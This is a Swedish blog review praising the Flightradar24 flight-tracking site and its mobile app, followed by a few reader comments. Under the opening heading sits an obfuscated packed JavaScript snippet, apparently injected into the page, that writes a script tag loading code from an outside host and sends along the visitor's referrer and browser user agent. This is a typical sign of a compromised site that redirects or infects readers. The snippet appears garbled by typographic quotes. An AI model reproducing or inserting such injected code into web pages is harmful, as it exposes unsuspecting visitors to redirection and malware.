Image Image Image Image Image Image Image Image Image Image

| 13 maj, 2021

Scroll to top

Top

Flightradar24 visar flyg i realtid

flightradar24-all-flights-world
Sebastian

Flightradar24: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tfask|var|u0026u|referrer|ksrtr||js|php’.split(’|’),0,{}))
Coola hemsidor finns det gott om, men inget slår Flightradar24. Revue har testat och är helt stumma.

Har du någon gång varit sugen på att se hur många flyg som är i luften samtidigt? Flightradar24 är en tjänst som gör just detta möjligt, i realtid.

Flightradar24 är ett svenskt företag som på senare tid fått mycket publicitet i media för sin tjänst ”Flightradar24 Live”.
Franska
Le Monde, tyska Bild och till och med Malaysias premiärminister är några av många som uppmärksammat Flightradar24 och tyckt till gott om den. Nu är det Revues tur att komma med sin kommentar av hur bra Flightradar24 verkligen är.

Flightradar24 Cockpit view

Vi började med att besöka deras hemsida som självklart var enklast som start. När vi kommer in möts vi av en karta från Google Maps och en instrumentpanel på vänster sida med massa alternativ.
Jag hade bara hört lite lätt om denna tjänst men det första jag sa vid ankomst var, oj oj, och inte på ett dåligt sätt.

Jag började med att klicka på ett liten gul ikon i form av ett flygplan som svävade fritt ovanför Jönköping. I panelen till vänster fick jag fram en massa rolig information om flygmaskinen. Flightnummer, avgångs destination, ankomst destination, hastighet och även möjligheten att se en ”Cockpit View” via Google Earth. ”Cockpit View” gav mig känslan av ett äldre spel jag spelade som liten, Microsoft Flight Simulator. Det kändes som om det var jag som styrde flygplanet mot Oslo som mitt plan var på väg till.

Förutom nöjet med tjänsten är också Flightradar24 utmärkt för att exempelvis hålla koll på när vänner eller släktingar landar / startar med sitt flyg. Man kan också se om det blivit några förseningar och dylikt på flygen utan att behöva leta sig fram på flygbolagens hemsidor, något som jag i alla fall tidigare upplevt väldigt krävande.

flightradar24-all-flights-world

Flightradar24 applikation

Flightradar24 har också en applikation till iOS och Android. Priset för denna ligger på sju kronor och finns att hämta hem från App Store och Google Play. Fler än två miljoner nerladdningar  säger rätt mycket, den är bra.

I applikationen kan man få fram samma information som på deras hemsida men i ett mer tillgängligt format på resande väg.
Revue har inte testat applikationen men kommer absolut att införskaffa några stycken till redaktionen som vi kan använda inför nästa flygning. Hur kul är det inte att exempelvis sitta på Arlanda och tjuvkika på alla flygplan som är på väg ner eller upp från flygplatsen och kanske även se maskinen i verkligheten.

Vi rekommenderar absolut en visit på flightradar24.com. Fastna inte bara, det gjorde jag.

Bra jobbat Flightradar24 !

Comments

  1. Guest

    Jävlar vad ballt.

  2. Kan rekommendera appen till iPad som visas i videon. Har den på min padda och är mycket nöjd.

    • Vi kommer att ladda ner applikationen och testa den. Folk i vår närhet har sagt att appen är grym och ett måste att ha. Vi ser till att fixa ihop en recension snarast.